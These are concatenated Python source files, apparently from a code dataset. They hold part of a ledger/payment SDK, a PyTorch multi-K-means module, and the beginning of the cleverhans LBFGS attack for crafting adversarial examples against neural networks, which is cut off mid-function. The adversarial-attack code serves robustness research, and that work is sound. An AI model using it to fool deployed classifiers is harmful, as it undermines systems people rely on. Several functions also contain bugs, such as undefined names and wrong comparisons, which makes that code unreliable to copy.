'msg': data['error_message']
}
@staticmethod
def parse_ledger(data, req):
if isinstance(data, dict) and data['callback']:
data = data['callback']
data = json.loads(data)
if data['status'] == 'success':
if data['result'].__contains__('ledger'):
ledger = data['result']['ledger']
else:
ledger = data['result']['closed']['ledger']
if req.message.__contains__('transactions') and req.message['transactions']:
return ledger
else:
return {
'accepted': ledger['accepted'],
'ledger_hash': ledger['hash'],
'ledger_index': ledger['ledger_index'],
'parent_hash': ledger['parent_hash'],
'close_time': ledger['close_time_human'],
'total_coins': ledger['total_coins']
}
else:
return {
'error': data['error'],
'msg': data['error_message']
}
else:
return data
def parse_ledger_closed(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
data = json.loads(data)
return {
'ledger_hash': data['result']['ledger_hash'],
'ledger_index': data['result']['ledger_index']
}
else:
return data
def parse_server_info(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
data = json.loads(data)
return {
'version': data['result']['info']['build_version'],
'ledgers': data['result']['info']['complete_ledgers'],
'node': data['result']['info']['pubkey_node'],
'state': data['result']['info']['server_state']
}
else:
return data
@staticmethod
def parse_account_tx_info(data, req):
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
data = data['result']
results = []
for tx in data['transactions']:
_tx = process_tx(tx, req.message['account'])
results.append(_tx)
data['transactions'] = results
return data
else:
return data
# if data['status'] == 'success':
# return {
# 'account': data['result']['account'],
# 'ledger_index_max': data['result']['ledger_index_max'],
# 'ledger_index_min': data['result']['ledger_index_min']
# }
# else:
# return {
# 'error': data['error']
# }
# else:
# return data
def parse_orderbook_info(self, data):
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
if data['status'] == 'success':
return {
'ledger_current_index': data['result']['ledger_current_index'],
'offers': data['result']['offers']
}
else:
return {
'error': data['error']
}
else:
return data
def parse_account_info(self, data):
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
if data['status'] == 'success':
account_data = {
'account_data': data['result']['account_data'],
'ledger_index': data['result']['ledger_index'],
'ledger_hash': data['result']['ledger_hash']
}
return account_data
else:
return {
'error': data['error'],
'msg': data['error_message']
}
else:
return data
def parse_account_tums(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
data = json.loads(data)
return {
'ledger_index': data['result']['ledger_index'],
'ledger_hash': data['result']['ledger_hash'],
'receive_currencies': data['result']['receive_currencies'],
'send_currencies': data['result']['send_currencies'],
'validated': data['result']['validated']
}
else:
return data
def parse_request_account_relations(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
data = json.loads(data)
if data['status'] == 'success':
return {
'account': data['result']['account'],
'ledger_hash': data['result']['ledger_hash'],
'ledger_index': data['result']['ledger_index'],
'lines': data['result']['lines'],
'validated': data['result']['validated']
}
else:
return {
'error': data['error'],
'msg': data['error_message']
}
else:
return data
def parse_request_account_offers(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
if not isinstance(data, dict):
data = json.loads(data)
if data['status'] == 'success':
return {
'account': data['result']['account'],
'ledger_hash': data['result']['ledger_hash'],
'ledger_index': data['result']['ledger_index'],
'offers': data['result']['offers']
}
else:
return {
'error': data['error'],
'msg': data['error_message']
}
else:
return data
"""
* payment
* @param options
* source|from|account source account, required
* destination|to destination account, required
* amount payment amount, required
* @returns {transaction}
* 创建支付对象
"""
def build_payment_tx(self, options):
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = Exception('invalid options type')
return tx
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
if options.__contains__('destination'):
dst = options['destination']
elif options.__contains__('to'):
dst = options['to']
amount = options['amount']
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
if not Wallet.is_valid_address(dst):
tx.tx_json['dst'] = Exception('invalid destination address')
return tx
if not utils.is_valid_amount(amount):
tx.tx_json['amount'] = Exception('invalid amount')
return tx
tx.tx_json['TransactionType'] = 'Payment'
tx.tx_json['Account'] = src
tx.tx_json['Amount'] = to_amount(amount)
tx.tx_json['Destination'] = dst
return tx
# 设置账号属性
def build_account_set_tx(self, options):
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = ValueError('invalid options type')
return tx
if not options['type'] in AccountSetTypes:
tx.tx_json['type'] = ValueError('invalid account set type')
return tx
if options['type'] == 'property':
return self.__build_account_set(options, tx)
elif options['type'] == 'delegate':
return self.__build_delegate_key_set(options, tx)
elif options['type'] == 'signer':
return self.__build_signer_set() # not implement yet
tx.tx_json['msg'] = Warning('build account set should not go here')
return tx
def __build_account_set(self, options, tx):
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
if options.__contains__('set_flag'):
set_flag = options['set_flag']
elif options.__contains__('set'):
set_flag = options['set']
if options.__contains__('clear_flag'):
clear_flag = options['clear_flag']
elif options.__contains__('clear'):
clear_flag = options['clear']
else:
clear_flag = None
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
tx.tx_json['TransactionType'] = 'AccountSet'
tx.tx_json['Account'] = src
SetClearFlags = set_clear_flags['AccountSet']
if set_flag:
set_flag = self.__prepare_flag(set_flag, SetClearFlags)
if set_flag:
tx.tx_json['SetFlag'] = set_flag
if clear_flag is not None:
clear_flag = self.__prepare_flag(clear_flag, SetClearFlags)
if clear_flag:
tx.tx_json['ClearFlag'] = clear_flag
return tx
def __prepare_flag(self, flag, SetClearFlags):
result = None
if isinstance(flag, (int, float)):
result = flag
else:
if flag in SetClearFlags:
result = SetClearFlags[flag]
else:
key = 'asf' + flag
if key in SetClearFlags:
result = SetClearFlags[key]
return result
def __build_delegate_key_set(self, options, tx):
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
delegate_key = options['delegate_key']
if not Wallet.is_valid_address(src):
tx.tx_json['delegate_key'] = Exception('invalid source address')
return tx
if not Wallet.is_valid_address(delegate_key):
tx.tx_json['delegate_key'] = Exception('invalid regular key address')
return tx
tx.tx_json['TransactionType'] = 'SetRegularKey'
tx.tx_json['Account'] = src
tx.tx_json['RegularKey'] = delegate_key
return tx
def __build_signer_set(self):
return None
# 挂单
def build_offer_create_tx(self, options):
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = TypeError('invalid options type')
return tx
offer_type = options['type']
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
if options.__contains__('taker_gets'):
taker_gets = options['taker_gets']
elif options.__contains__('pays'):
taker_gets = options['pays']
if options.__contains__('taker_pays'):
taker_pays = options['taker_pays']
elif options.__contains__('gets'):
taker_pays = options['gets']
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
if not isinstance(offer_type, str) or not offer_type in OfferTypes:
tx.tx_json['offer_type'] = TypeError('invalid offer type')
return tx
if isinstance(taker_gets, str) and not int(taker_gets) and not float(taker_gets):
tx.tx_json['taker_gets2'] = Exception('invalid to pays amount')
return tx
if not taker_gets and not utils.is_valid_amount(taker_gets):
tx.tx_json['taker_gets2'] = Exception('invalid to pays amount object')
return tx
if isinstance(taker_pays, str) and not int(taker_pays) and not not float(taker_pays):
tx.tx_json['taker_pays2'] = Exception('invalid to gets amount')
return tx
if not taker_pays and not utils.is_valid_amount(taker_pays):
tx.tx_json['taker_pays2'] = Exception('invalid to gets amount object')
return tx
tx.tx_json['TransactionType'] = 'OfferCreate'
if offer_type is 'Sell':
tx.set_flags(offer_type)
tx.tx_json['Account'] = src
tx.tx_json['TakerPays'] = to_amount(taker_pays)
tx.tx_json['TakerGets'] = to_amount(taker_gets)
return tx
# 取消挂单
def build_offer_cancel_tx(self, options):
tx = Transaction(self, None)
if not options:
tx.tx_json.obj = Exception('invalid options type')
return tx
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
sequence = options['sequence']
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
if not int(sequence) and not float(sequence):
tx.tx_json['sequence'] = Exception('invalid sequence param')
return tx
tx.tx_json['TransactionType'] = 'OfferCancel'
tx.tx_json['Account'] = src
tx.tx_json['OfferSequence'] = int(sequence)
return tx
def __build_relation_set(self, options, tx):
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
des = options['target']
limit = options['limit']
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
if not Wallet.is_valid_address(des):
tx.tx_json['des'] = Exception('invalid target address')
return tx
if not utils.is_valid_amount(limit):
tx.tx_json['limit'] = Exception('invalid amount')
return tx
if options['type'] == 'unfreeze':
tx.tx_json['TransactionType'] = 'RelationDel'
else:
tx.tx_json['TransactionType'] = 'RelationSet'
tx.tx_json['Account'] = src
tx.tx_json['Target'] = des
if options['type'] == 'authorize':
tx.tx_json['RelationType'] = 1
else:
tx.tx_json['RelationType'] = 3
if limit:
tx.tx_json['LimitAmount'] = limit
return tx
def __build_trust_set(self, options, tx):
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
limit = options['limit']
if options.__contains__('quality_out'):
tx.tx_json['QualityIn'] = options['quality_out']
if options.__contains__('quality_in'):
tx.tx_json['QualityOut'] = options['quality_in']
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
if not utils.is_valid_amount(limit):
tx.tx_json['limit'] = Exception('invalid amount')
return tx
tx.tx_json['TransactionType'] = 'TrustSet'
tx.tx_json['Account'] = src
if limit:
tx.tx_json['LimitAmount'] = limit
return tx
"""
* add wallet relation set
* @param options
* type: Transaction.RelationTypes
* source|from|account source account, required
* limit limt amount, required
* quality_out, optional
* quality_in, optional
* @returns {Transaction}
* 创建关系对象
"""
def build_relation_tx(self, options):
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = Exception('invalid options type')
return tx
if not options['type'] in RelationTypes:
tx.tx_json['type'] = Exception('invalid relation type')
return tx
if options['type'] == 'trust':
return self.__build_trust_set(options, tx)
elif options['type'] == 'authorize' or \
options['type'] == 'freeze' or options['type'] == 'unfreeze':
return self.__build_relation_set(options, tx)
tx.tx_json['msg'] = Exception('build relation set should not go here')
return tx
# 获得账号交易列表
def request_account_tx(self, options):
data = []
request = Request(self, 'account_tx', None)
if not isinstance(options, object):
request.message['type'] = Exception('invalid options type')
return request
if not Wallet.is_valid_address(options['account']):
request.message['account'] = Exception('account parameter is invalid')
return request
request.message['account'] = options['account']
if options.__contains__('ledger_min') and Number(options['ledger_min']):
request.message['ledger_index_min'] = Number(options['ledger_min'])
else:
request.message['ledger_index_min'] = 0
if options.__contains__('ledger_max') and Number(options['ledger_max']):
request.message['ledger_index_max'] = Number(options['ledger_max'])
else:
request.message['ledger_index_max'] = -1
if options.__contains__('limit') and isinstance(options['limit'], int):
if options['limit'] > 0: # limit must be positive
request.message['limit'] = options['limit']
if options.__contains__('offset') and Number(options['offset']):
request.message['offset'] = Number(options['offset'])
if options.__contains__('marker') and isinstance(options['marker'], 'object') and Number(
options.marker['ledger']) != None and Number(
options['marker']['seq']) != None:
request.message['marker'] = options['marker']
if options.__contains__('forward') and isinstance(options['forward'], 'boolean'):
request.message['forward'] = options['forward']
return request
# 获得市场挂单列表
def request_order_book(self, options):
request = Request(self, 'book_offers', None)
if not isinstance(options, object):
request.message['type'] = Exception('invalid options type')
return request
# taker_gets = options['taker_gets'] or options['pays']
if options.__contains__('taker_gets'):
taker_gets = options['taker_gets']
elif options.__contains__('pays'):
taker_gets = options['pays']
if not utils.is_valid_amount0(taker_gets):
request.message['taker_gets'] = Exception('invalid taker gets amount')
return request
# taker_pays = options['taker_pays'] or options['gets']
if options.__contains__('taker_pays'):
taker_pays = options['taker_pays']
elif options.__contains__('gets'):
taker_pays = options['gets']
if not utils.is_valid_amount0(taker_pays):
request.message['taker_pays'] = Exception('invalid taker pays amount')
return request
if options.__contains__('limit'):
if isinstance(options['limit'], int):
options['limit'] = int(options['limit'])
request.message['taker_gets'] = taker_gets
request.message['taker_pays'] = taker_pays
if options.__contains__('taker'):
request.message['taker'] = options['taker']
else:
request.message['taker'] = Config.ACCOUNT_ONE
# request.message['taker'] = options['taker'] if options['taker'] else utils['ACCOUNT_ONE']
if options.__contains__('limit'):
request.message['limit'] = options['limit']
return request
|
the-stack_106_15866
|
import torch
import torch.nn as nn
import numpy as np
import math
from time import time
from .kernels import MaxSimCUDA
from .kernels import ComputeCentroidsCUDA
from ..CustomModule import CustomModule
class MultiKMeans(CustomModule):
"""
Run multiple independent K-means algorithms in parallel.
Parameters:
n_clusters: int,
Number of clusters
max_iter: int, default: 100
Maximum number of iterations
tol: float, default: 0.0001
Tolerance
n_redo: int, default: 1
Number of time k-means will be run with differently intialized centroids.
the centroids with the lowest inertia will be selected as a final result.
init_mode: {'random', 'kmeans++'}, default: 'random'
Initialization method
'random': randomly chose initial centroids from input data
'kmeans++': use k-means++ algorithm to initialize centroids, slow when n_cluster is large, but converges faster)
verbose: int, default: 0
Verbosity
distance: {'euclidean', 'cosine', 'manhattan'}, default: 'euclidean'
Type of distance metric
note: manhattan or L1 distance is only supported on GPU
Attributes:
centroids: torch.Tensor, shape: [d_vector, n_clusters]
cluster centroids
"""
def __init__(
self,
n_clusters,
n_redo=1,
max_iter=100,
tol=1e-4,
distance="euclidean",
init_mode="random",
verbose=0,
sm_size=48*256*4,
):
super(MultiKMeans, self).__init__()
self.n_redo = n_redo
self.n_clusters = n_clusters
self.max_iter = max_iter
self.tol = tol
self.verbose = verbose
self.distance = distance
self.init_mode = init_mode
self.sm_size = sm_size
self.arange = None
if n_clusters < 4096:
dk = n_clusters
else:
dk = 4096
de = 1
self.register_buffer("centroids", None)
if torch.cuda.is_available():
self.compute_centroids_cuda = ComputeCentroidsCUDA(
de=de,
dk=dk,
sm_size=sm_size,
)
if distance in ["euclidean", "manhattan"]:
distance = distance
elif distance in ["cosine"]:
distance = "inner"
self.max_sim_cuda = MaxSimCUDA(
distance=distance,
)
@staticmethod
def remaining_memory(device):
"""
Get remaining memory of GPU in bytes
"""
# torch.cuda.synchronize()
if device.type == "cpu":
remaining = 32 * 1024 ** 3 # just a random large number
elif device.type == "cuda":
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
remaining = total_memory - torch.cuda.memory_reserved()
# remaining = total_memory - torch.cuda.memory_allocated()
return remaining
@staticmethod
def does_it_fit(size, device="cpu", dtype=torch.float):
try:
torch.empty(size, device=device, dtype=dtype)
except:
return False
else:
return True
@staticmethod
def calculate_error(a, b):
"""
Compute L2 error between 'a' and 'b'
"""
diff = a - b
diff.pow_(2)
return diff.sum()
@staticmethod
def calculate_inertia(a):
return (-a).mean()
@staticmethod
def cos_sim(a, b, normalize=True, inplace=False):
"""
Compute batched cosine similarity between 'a' and 'b'
a: torch.Tensor, shape : [n_kmeans, d_vector, m]
b: torch.Tensor, shape : [n_kmeans, d_vector, n]
normalize: bool, default : True
if True, a and b will be normalized to norm=1
inplace: bool, default : False
returns: torch.Tensor, shape : [l, m, n]
"""
if normalize:
a_norm = a.norm(dim=-2, keepdim=True) + 1e-8 #[l, m] <l*(m*4)>
b_norm = b.norm(dim=-2, keepdim=True) + 1e-8 #[l, n] <l*(m*4 + n*4)>
if inplace:
# memory consump: m + n + (m * n)
a.div_(a_norm)
b.div_(b_norm)
else:
# memory consum: m + n + (m * n) + m*d + n*d
a = a / a_norm #[l, d_vector, m], l*(<m*4 + n*4> + <m*d*4>)
b = b / b_norm #[l, d_vector, n], l*(<m*4 + n*4> + <(m+n)*d*4>)
prod = a.transpose(-2, -1) @ b #[l, m, n], <m*n*4 + m*4 + n*4> + <(m+n)*d*4>
if inplace and normalize:
a.mul_(a_norm)
b.mul_(b_norm)
return prod
@staticmethod
def euc_sim(a, b, inplace=False):
"""
Compute batched negative squared euclidean distance between 'a' and 'b'
a: torch.Tensor, shape : [l, d_vector, m]
b: torch.Tensor, shape : [l, d_vector, n]
inplace: bool, default : False
returns: torch.Tensor, shape : [l, m, n]
"""
# peak mem uwage: m*n*4 + max(m,n)*4 + inplace ? 0: (m+n)*d*4
y = a.transpose(-2, -1) @ b # [m, n] <m*n*4>
y.mul_(2)
if inplace:
a.pow_(2)
b.pow_(2)
else:
a = a ** 2 #[m, d], <m*n*4 + m*d*4>
b = b ** 2 #[n, d], <m*n*4 + n*d*4 + m*d*4>
a2 = a.sum(dim=-2)[..., :, None] #? [m], <m*n*4 + m*4> + <n*d*4 + m*d*4>
y.sub_(a2)
del a2
b2 = b.sum(dim=-2)[..., None, :] #[n], <m*n*4 + n*4> + <n*d*4 + m*d*4>
y.sub_(b2)
if inplace:
a.sqrt_()
b.sqrt_()
return y
def sim(self, a, b, inplace=False, normalize=True):
"""
Compute batched similarity between 'a' and 'b', the type of distance metric is specified in __init__ method
a: torch.Tensor, shape : [l, d, m]
b: torch.Tensor, shape : [l, d, n]
returns: torch.Tensor, shape : [l, m, n]
"""
if self.distance == "euclidean":
return self.euc_sim(a, b, inplace=inplace)
elif self.distance == "cosine":
return self.cos_sim(a, b, inplace=inplace, normalize=normalize)
elif self.distance == "inner":
return self.cos_sim(a, b, inplace=inplace, normalize=False)
### Need more testing:
def kmeanspp(self, data):
"""
Initialize centroids with k-means++ algorithm
data: torch.Tensor, shape : [l, d_vector, n_data]
returns: torch.Tensor, shape : [l, d_vector, n_clusters]
"""
l, d_vector, n_data = data.shape
if self.distance == "cosine":
data_norm = data.norm(dim=-2, keepdim=True) + 1e-8
data.div_(data_norm)
centroids = torch.zeros(l, d_vector, self.n_clusters, device=data.device, dtype=data.dtype)
#Select initial centroid
centroids[:, :, 0] = data[:, :, np.random.randint(n_data)]
for i in range(1, self.n_clusters):
current_centroids = centroids[:, :, :i].contiguous()
if data.device.type == "cpu":
sims = self.sim(data, current_centroids ) #[l,m,n]
max_sims_v, max_sims_i = sims.max(dim=-1) #[l,m]
elif data.device.type == "cuda":
max_sims_v, max_sims_i = self.max_sim_cuda(data, current_centroids, dim=2, mode="tn")
index = max_sims_v.argmin(dim=-1) #[l]
arange = torch.arange(l, device=device)
new_centroid = data[arange, :, index] #[l, d_vector]
centroids[:, :, i] = new_centroid
if self.distance == "cosine":
data.mul_(data_norm)
return centroids
def initialize_centroids(self, data):
"""
Initialize centroids with init_method specified in __init__
data: torch.Tensor, shape : [l, d_vector, n_data]
return: torch.Tensor, shape: [l, d_vector, n_clusters]
"""
l, d_vector, n_data = data.shape
if self.init_mode == "random":
random_index = np.random.choice(
n_data,
size=[self.n_clusters],
replace=False
)
centroids = data[:, :, random_index]
if self.verbose >= 1:
print("centroids are randomly initialized.")
elif self.init_mode == "kmeans++":
centroids = self.kmeanspp(data)
if self.verbose >= 1:
print("kmeans++ initialization is done!")
return centroids
def get_labels(self, data, centroids):
"""
data: torch.Tensor, shape : [l, d_vector, n_data]
centroids: torch.Tensor, shape : [l, d_vector, n_clusters]
return: torch.Tensor, shape : [l, n_data], dtype: long
"""
#memory requirement:
l, d, m = data.shape
l, d, n = centroids.shape
remaining = self.remaining_memory(data.device)# - 1024*3
if self.distance == "euclidean":
required = l*(m*n + max(m, n) + m*d + n*d) * data.element_size()
elif self.distance in ["cosine", "inner"]:
required = l*((m*n) + (m+n)*(d+1)) * data.element_size()
if remaining >= required:
sims = self.sim(data, centroids, inplace=False) #[l, m, n]
maxsims, labels = sims.max(dim=-1) #[l, m]
return (maxsims, labels)
else:
if data.device.type == "cuda":
if self.distance == "cosine":
d_norm = data.norm(dim=-2, keepdim=True) + 1e-8
c_norm = centroids.norm(dim=-2, keepdim=True) + 1e-8
data.div_(d_norm)
centroids.div_(c_norm)
maxsims, labels = self.max_sim_cuda(data, centroids, dim=2, mode="tn")
if self.distance == "cosine":
data.mul_(d_norm)
centroids.mul_(c_norm)
elif data.device.type == "cpu":
## doing in seperate chunks
n_partitions = 1
for i in range(16):
sub_m = math.ceil(m / n_partitions)
if self.distance == "euclidean":
required = l*(sub_m*n + max(sub_m, n)) * data.element_size() + m*8 # +sub_m*d*4
elif self.distance in ["cosine", "inner"]:
required = l*(sub_m*n + sub_m+n) * data.element_size() + m*8# +sub_m*d*4
# print("required, remaining, n_p", required / 1024**3, remaining / 1024**3, n_partitions)
if self.does_it_fit(required // 4, device=data.device, dtype=torch.float):
break
n_partitions *= 2
maxsims = torch.zeros(l, m, device=data.device, dtype=torch.float)
labels = torch.zeros(l, m, device=data.device, dtype=torch.long)
for i in range(n_partitions):
start = i*sub_m
if i == n_partitions - 1:
end = m - 1
else:
end = (i+1)*sub_m
sub_data = torch.narrow(data, dim=-1, start=start, length=end-start) #[l, d, sub_m]
# sub_data = data[:, start:end] #[l, d, sub_m]
sub_sims = self.sim(sub_data, centroids, inplace=True) #[l, sub_m, n]
del sub_data
sub_maxsims, sub_labels = sub_sims.max(dim=-1) #[l, sub_m]
del sub_sims
labels[:, start:end] = sub_labels
maxsims[:, start:end] = sub_maxsims
del sub_labels
return (maxsims, labels)
def compute_centroids_loop(self, data, labels):
"""
data: torch.Tensor, shape : [l, d_vector, n_data]
labels: torch.Tensor, shape : [l, n_data]
return: torch.Tensor, shape : [l, d_vector, n_clusters]
"""
### Naive method with loop
l, d, m = data.shape
centroids = torch.zeros(l, d, self.n_clusters, device=data.device, dtype=data.dtype)
for j in range(l):
unique_labels, counts = labels[j].unique(return_counts=True)
for i, count in zip(unique_labels, counts):
centroids[j, :, i] = data[j, :, labels[j]==i].sum(dim=1) / count
return centroids
def compute_centroids(self, data, labels):
"""
data: torch.Tensor, shape : [l, d_vector, n_data]
labels: torch.Tensor, shape : [l, n_data]
return: torch.Tensor, shape: [l, d_vector, n_clusters]
"""
if data.device == torch.device("cpu"):
centroids = self.compute_centroids_loop(data, labels)
else:
centroids = self.compute_centroids_cuda(data, labels, k=self.n_clusters)
return centroids
def _compute_centroids_hungry(self, data, labels):
### Memory hungry method
# expanded_labels = labels[None].expand(self.n_clusters, -1) #[k, n], k=n_clusters <>
if self.arange is None\
or self.arange.dtype != data.dtype\
or self.arange.device != data.device:
self.arange = torch.arange(self.n_clusters, device=data.device) #[k] <k*8>
mask = labels[None, :] == self.arange[:, None] #[k, n] <k*n*1 + k*8>
mask_sum = mask.sum(dim=-1) #[k] <k*n*1 + k*12>
mask = mask.float() # <k*n*5 + k*12> LARGEST MEMORY USE!!!
centroids = mask @ data # <k*n*4 + k*12 + k*d*4>
del mask
centroids.div_(mask_sum[..., :, None]) # <k*d*4 + k*12>
del mask_sum
nan_mask = centroids!=centroids #[k, d] # <k*d*8>
centroids[nan_mask] = 0 # remove NaNs
return centroids
def fit(self, data, centroids=None):
"""
Perform K-means clustering, and return final labels
data: torch.Tensor, shape : [l, d_vector, n_data]
return: torch.Tensor, shape : [l, n_data], dtype: long
"""
assert data.is_contiguous(), "use .contiguous()"
best_centroids = None
best_error = 1e32
best_labels = None
best_inertia = 1e32
tm = time()
for i in range(self.n_redo):
tm_i = time()
if centroids is None:
centroids = self.initialize_centroids(data)
for j in range(self.max_iter):
# 1 iteration of clustering
maxsims, labels = self.get_labels(data, centroids) #top1 search
new_centroids = self.compute_centroids(data, labels)
error = self.calculate_error(centroids, new_centroids)
centroids = new_centroids
inertia = self.calculate_inertia(maxsims)
if self.verbose >= 3:
print(f"----iteration {j} of {i}th redo, error={error.item()}, inertia={inertia.item()}")
if error <= self.tol:
break
if inertia < best_inertia:
best_centroids = centroids
best_error = error
best_labels = labels
best_inertia = inertia
if self.verbose >= 2:
print(f"--{i}th redo finished, error: {error.item()}, inertia: {inertia.item()}time spent:{round(time()-tm_i, 4)} sec")
self.register_buffer("centroids", best_centroids)
if self.verbose >= 1:
print(f"finished {self.n_redo} redos in {round(time()-tm, 4)} sec, final_inertia: {best_inertia}")
return best_labels
def predict(self, query):
"""
Predict closest cluster center each sample in query belongs to.
query: torch.Tensor, shape : [l, d_vector, n_query]
return: torch.Tensor, shape : [l, n_query]
"""
assert self.centroids is not None, "kmeans is not trained"
_, labels = self.get_labels(query, self.centroids)
return labels
def topk(self, query, k):
"""
Predict the top-k closest cluster centers of each sample in query
query: torch.Tensor, shape : [l, d_vector, n_query]
k: int, should be in range [1, n_centroids]
"""
assert self.centroids is not None, "kmeans is not trained"
assert k <= self.n_centroids, "k is too large"
sims = self.sim(query, self.centroids) #[l, n_query, n_clusters]
topkv, topki = sims.topk(dim=-1, k=k) #[l, n_query, k]
return (topkv, topki)
|
the-stack_106_15868
|
"""The LBFGS attack
"""
import numpy as np
import tensorflow as tf
from cleverhans.attacks.attack import Attack
from cleverhans.compat import reduce_sum, softmax_cross_entropy_with_logits
from cleverhans.model import CallableModelWrapper, Model, wrapper_warning
from cleverhans import utils
from cleverhans import utils_tf
_logger = utils.create_logger("cleverhans.attacks.lbfgs")
tf_dtype = tf.as_dtype('float32')
class LBFGS(Attack):
"""
LBFGS is the first adversarial attack for convolutional neural networks,
and is a target & iterative attack.
Paper link: "https://arxiv.org/pdf/1312.6199.pdf"
:param model: cleverhans.model.Model
:param sess: tf.Session
:param dtypestr: dtype of the data
:param kwargs: passed through to super constructor
"""
def __init__(self, model, sess, dtypestr='float32', **kwargs):
if not isinstance(model, Model):
wrapper_warning()
model = CallableModelWrapper(model, 'probs')
super(LBFGS, self).__init__(model, sess, dtypestr, **kwargs)
self.feedable_kwargs = ('y_target',)
self.structural_kwargs = [
'batch_size', 'binary_search_steps', 'max_iterations',
'initial_const', 'clip_min', 'clip_max'
]
def generate(self, x, **kwargs):
"""
Return a tensor that constructs adversarial examples for the given
input. Generate uses tf.py_func in order to operate over tensors.
:param x: (required) A tensor with the inputs.
:param kwargs: See `parse_params`
"""
assert self.sess is not None, \
'Cannot use `generate` when no `sess` was provided'
self.parse_params(**kwargs)
if self.y_target is None:
self.y_target, nb_classes = self.get_or_guess_labels(x, kwargs)
self.targeted_attack = False
else:
_, nb_classes = self.get_or_guess_labels(x, kwargs)
self.targeted_attack = True
attack = LBFGS_impl(
self.sess, x, self.model.get_logits(x),
self.y_target, self.targeted_attack,
self.binary_search_steps, self.max_iterations, self.initial_const,
self.clip_min, self.clip_max, nb_classes, self.batch_size)
def lbfgs_wrap(x_val, y_val):
"""
Wrapper creating TensorFlow interface for use with py_func
"""
return np.array(attack.attack(x_val, y_val), dtype=self.np_dtype)
wrap = tf.py_func(lbfgs_wrap, [x, self.y_target], self.tf_dtype)
wrap.set_shape(x.get_shape())
return wrap
def parse_params(self,
y_target=None,
batch_size=1,
binary_search_steps=5,
max_iterations=1000,
initial_const=1e-2,
clip_min=0,
clip_max=1):
"""
:param y_target: (optional) A tensor with the one-hot target labels.
:param batch_size: The number of inputs to include in a batch and
process simultaneously.
:param binary_search_steps: The number of times we perform binary
search to find the optimal tradeoff-
constant between norm of the purturbation
and cross-entropy loss of classification.
:param max_iterations: The maximum number of iterations.
:param initial_const: The initial tradeoff-constant to use to tune the
relative importance of size of the perturbation
and cross-entropy loss of the classification.
:param clip_min: (optional float) Minimum input component value
:param clip_max: (optional float) Maximum input component value
"""
self.y_target = y_target
self.batch_size = batch_size
self.binary_search_steps = binary_search_steps
self.max_iterations = max_iterations
self.initial_const = initial_const
self.clip_min = clip_min
self.clip_max = clip_max
class LBFGS_impl(object):
"""
Return a tensor that constructs adversarial examples for the given
input. Generate uses tf.py_func in order to operate over tensors.
:param sess: a TF session.
:param x: A tensor with the inputs.
:param logits: A tensor with model's output logits.
:param targeted_label: A tensor with the target labels.
:param binary_search_steps: The number of times we perform binary
search to find the optimal tradeoff-
constant between norm of the purturbation
and cross-entropy loss of classification.
:param max_iterations: The maximum number of iterations.
:param initial_const: The initial tradeoff-constant to use to tune the
relative importance of size of the purturbation
and cross-entropy loss of the classification.
:param clip_min: Minimum input component value
:param clip_max: Maximum input component value
:param num_labels: The number of classes in the model's output.
:param batch_size: Number of attacks to run simultaneously.
"""
def __init__(self, sess, x, logits, targeted_label, targeted_attack,
binary_search_steps, max_iterations, initial_const, clip_min,
clip_max, nb_classes, batch_size):
self.sess = sess
self.x = x
self.logits = logits
assert logits.op.type != 'Softmax'
self.targeted_label = targeted_label
self.targeted_attack = targeted_attack
self.binary_search_steps = binary_search_steps
self.max_iterations = max_iterations
self.initial_const = initial_const
self.clip_min = clip_min
self.clip_max = clip_max
self.batch_size = batch_size
self.repeat = self.binary_search_steps >= 10
self.shape = tuple([self.batch_size] +
list(self.x.get_shape().as_list()[1:]))
self.ori_img = tf.Variable(
np.zeros(self.shape), dtype=tf_dtype, name='ori_img')
self.const = tf.Variable(
np.zeros(self.batch_size), dtype=tf_dtype, name='const')
self.score = softmax_cross_entropy_with_logits(
labels=self.targeted_label, logits=self.logits)
self.l2dist = reduce_sum(tf.square(self.x - self.ori_img))
# small self.const will result small adversarial perturbation
# targeted attack aims at minimize loss against target label
# untargeted attack aims at maximize loss against True label
if self.targeted_attack:
self.loss = reduce_sum(self.score * self.const) + self.l2dist
else:
self.loss = -reduce_sum(self.score * self.const) + self.l2dist
self.grad, = tf.gradients(self.loss, self.x)
def attack(self, x_val, targets):
"""
Perform the attack on the given instance for the given targets.
"""
def lbfgs_objective(adv_x, self, targets, oimgs, CONST):
""" returns the function value and the gradient for fmin_l_bfgs_b """
loss = self.sess.run(
self.loss,
feed_dict={
self.x: adv_x.reshape(oimgs.shape),
self.targeted_label: targets,
self.ori_img: oimgs,
self.const: CONST
})
grad = self.sess.run(
self.grad,
feed_dict={
self.x: adv_x.reshape(oimgs.shape),
self.targeted_label: targets,
self.ori_img: oimgs,
self.const: CONST
})
